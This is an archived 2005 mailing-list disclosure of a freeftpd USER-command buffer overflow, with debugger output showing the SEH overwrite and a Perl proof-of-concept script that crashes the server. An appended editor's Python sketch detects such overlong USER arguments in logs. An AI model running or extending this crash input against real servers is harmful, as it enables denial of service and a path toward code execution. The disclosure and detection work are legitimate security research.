Message-ID: <981281b10511160156x26da1beco2bdd1547b809abe5@mail.gmail.com>
Date: Wed Nov 16 10:39:57 2005
From: barbsie at gmail.com (barabas mutsonline)
Subject: freeftpd USER bufferoverflow
Hi,
While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which I use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and this is what I found:
ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
Well, EIP doesn't get overwritten, but SEH does:
0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler
EIP 47464544
Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
I leave the exploit coding as an exercise...
enjoy
sample crash code:
#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005
use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("$user","whatevah");
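Added by the editor, not part of barabas's post or of freeftpd: a detection sketch that scans FTP control-channel log lines for USER arguments long enough to reach the region the post describes (the crash needs more than 1012 bytes; the PoC puts its SEH overwrite at offset 1011). The log format, the alert threshold and the sample lines are constructed assumptions.

```python
import re
from collections import Counter

# Assumed control-channel log format (constructed for this example):
#   "<date> <time> <client-ip> <FTP command> [argument]"
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<client>\S+) (?P<cmd>[A-Za-z]+)(?: (?P<arg>.*))?$"
)

# The post reports that more than 1012 bytes at the login prompt crash freeftpd.
# Real usernames are far shorter, so the threshold is an assumption to tune per site.
MAX_USER_LEN = 256

def parse_line(line):
    """Return (client, cmd, arg) for a command record, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group("client"), m.group("cmd").upper(), m.group("arg") or ""

def fill_ratio(arg):
    """Fraction of the argument made of its single most common character.
    Overflow padding such as "A" * 1011 scores close to 1.0; real usernames do not."""
    if not arg:
        return 0.0
    return Counter(arg).most_common(1)[0][1] / len(arg)

def assess_user(client, arg, threshold=MAX_USER_LEN):
    """Summarise one USER argument: its length, whether it exceeds the threshold,
    and how much of it is a single repeated character."""
    return {
        "client": client,
        "length": len(arg),
        "over_threshold": len(arg) > threshold,
        "fill_ratio": round(fill_ratio(arg), 2),
    }

def scan(lines, threshold=MAX_USER_LEN):
    """Return one finding per USER command whose argument exceeds the threshold."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[1] != "USER":
            continue
        client, _, arg = rec
        result = assess_user(client, arg, threshold)
        if result["over_threshold"]:
            findings.append(result)
    return findings

# Constructed sample log: a normal login, then a USER argument shaped like the
# post's PoC (1011 filler bytes, 4 bytes over the SEH handler, 400 trailing bytes).
SAMPLE_LOG = [
    "2005-11-16 10:39:57 10.0.0.5 USER alice",
    "2005-11-16 10:39:58 10.0.0.5 PASS hunter2",
    "2005-11-16 10:40:02 10.0.0.7 USER " + "A" * 1011 + "DEFG" + "P" * 400,
    "2005-11-16 10:40:03 10.0.0.7 QUIT",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"suspicious USER from {f['client']}: {f['length']} bytes, fill ratio {f['fill_ratio']}")
```

The same length check, applied at a proxy or in the server's own command parser before any fixed-size copy, is the mitigation side of this bug class.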